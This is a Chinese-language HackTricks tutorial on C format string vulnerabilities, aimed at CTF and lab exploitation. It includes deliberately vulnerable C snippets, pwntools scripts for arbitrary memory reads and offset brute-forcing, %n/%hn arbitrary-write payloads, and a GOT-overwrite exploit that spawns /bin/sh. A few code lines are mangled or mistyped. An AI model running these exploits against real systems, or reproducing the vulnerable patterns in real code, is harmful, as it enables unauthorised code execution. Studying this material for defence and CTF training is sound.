Format Strings

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

您在网络安全公司工作吗？您想看到您的公司在HackTricks中做广告吗？或者您想访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
发现我们的独家NFT收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入 💬 Discord群组 或 电报群组 或在Twitter上关注我 🐦@carlospolopm。
通过向 hacktricks仓库 和 hacktricks-cloud仓库 提交PR来分享您的黑客技巧。

基本信息

在C语言中，printf是一个用于打印字符串的函数。该函数期望的第一个参数是带有格式化符号的原始文本。接下来期望的参数是要从原始文本中替换格式化符号的值。

其他存在漏洞的函数包括**sprintf()和fprintf()**。

当将攻击者文本用作该函数的第一个参数时，漏洞就会出现。攻击者将能够通过滥用printf格式字符串的功能来构建一个特殊输入，以读取和写入任何地址的任何数据（可读/可写）。从而能够执行任意代码。

格式化符号:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

示例:

漏洞示例:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

正常使用：

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

缺少参数时:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

fprintf易受攻击:

#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input cna include formatters!
fclose(output_file);
return 0;
}

访问指针

格式%<n>$x，其中n是一个数字，允许指示printf选择第n个参数（来自堆栈）。因此，如果您想使用printf读取堆栈中的第4个参数，可以执行以下操作：

printf("%x %x %x %x")

并且您将从第一个到第四个参数读取。

或者您可以执行：

printf("$4%x")

并直接读取第四个。

注意，攻击者控制printf参数，这基本上意味着他的输入将在调用printf时位于堆栈中，这意味着他可以在堆栈中写入特定的内存地址。

控制此输入的攻击者将能够在堆栈中添加任意地址并使printf访问它们。在下一节中将解释如何利用这种行为。

任意读取

可以使用格式化程序**%n$s使printf获取位于n位置的地址**，并在其后打印它，就好像它是一个字符串（打印直到找到0x00为止）。因此，如果二进制文件的基地址为**0x8048000**，并且我们知道用户输入从堆栈的第4个位置开始，就可以打印二进制文件的开头：

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

请注意，您不能在输入开头放置地址0x8048000，因为该地址的末尾将被0x00截断。

查找偏移量

要找到输入的偏移量，您可以发送4或8个字节（0x41414141），然后跟随**%1$x并增加**该值，直到检索到A's。

Brute Force printf offset

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### 有多有用

任意读取可以用于：

- **从内存中转储**二进制文件
- **访问存储敏感信息的内存特定部分**（如canaries、加密密钥或自定义密码，就像在这个[CTF挑战](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)中）

## **任意写入**

格式化程序 **`$<num>%n`** 在堆栈中的 \<num> 参数中**写入**所写字节的**数量**到指定地址。如果攻击者可以使用printf写入尽可能多的字符，他将能够使 **`$<num>%n`** 在任意地址写入任意数字。

幸运的是，要写入数字9999，并不需要在输入中添加9999个"A"，为了做到这一点，可以使用格式化程序 **`%.<num-write>%<num>$n`** 将数字 **`<num-write>`** 写入由 `num` 位置指向的地址。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

然而，请注意，通常为了写入诸如0x08049724这样的地址（一次写入一个巨大的数字），会使用$hn而不是$n。这样可以仅写入2字节。因此，此操作需要执行两次，一次用于地址的最高2字节，另一次用于最低的字节。

因此，此漏洞允许在任何地址中写入任何内容（任意写入）。

在此示例中，目标是覆盖稍后将调用的GOT表中函数的地址。尽管这可能会滥用其他任意写入执行技术：

我们将覆盖一个从用户接收参数并将其指向**system函数的函数**。如前所述，通常需要两个步骤来写入地址：首先写入地址的2字节，然后写入另外2字节。为此，使用**$hn**。

HOB 用于地址的2个高字节
LOB 用于地址的2个低字节

然后，由于格式字符串的工作方式，您需要首先写入[HOB，LOB]中较小的那个，然后再写入另一个。

如果 HOB < LOB [address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

如果 HOB > LOB [address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools模板

您可以在以下位置找到一个模板，用于准备利用这种类型漏洞的利用程序：

或者可以参考这个基本示例这里:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

格式字符串到缓冲区溢出

可以利用格式字符串漏洞的写入操作来写入栈上的地址，并利用缓冲区溢出类型的漏洞。

其他示例和参考资料

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32位，无relro，无canary，nx，无pie，基本使用格式字符串从栈中泄漏标志（无需更改执行流程）
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32位，relro，无canary，nx，无pie，格式字符串覆盖地址fflush为win函数（ret2win）
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32位，relro，无canary，nx，无pie，格式字符串写入.fini_array中main内的地址（使流程再次循环1次），并将地址写入指向strlen的GOT表中的system。当流程返回到main时，strlen将以用户输入执行，并指向system，将执行传递的命令。

上一页Integer Overflow 下一页Format Strings - Arbitrary Read Example

最后更新于1年前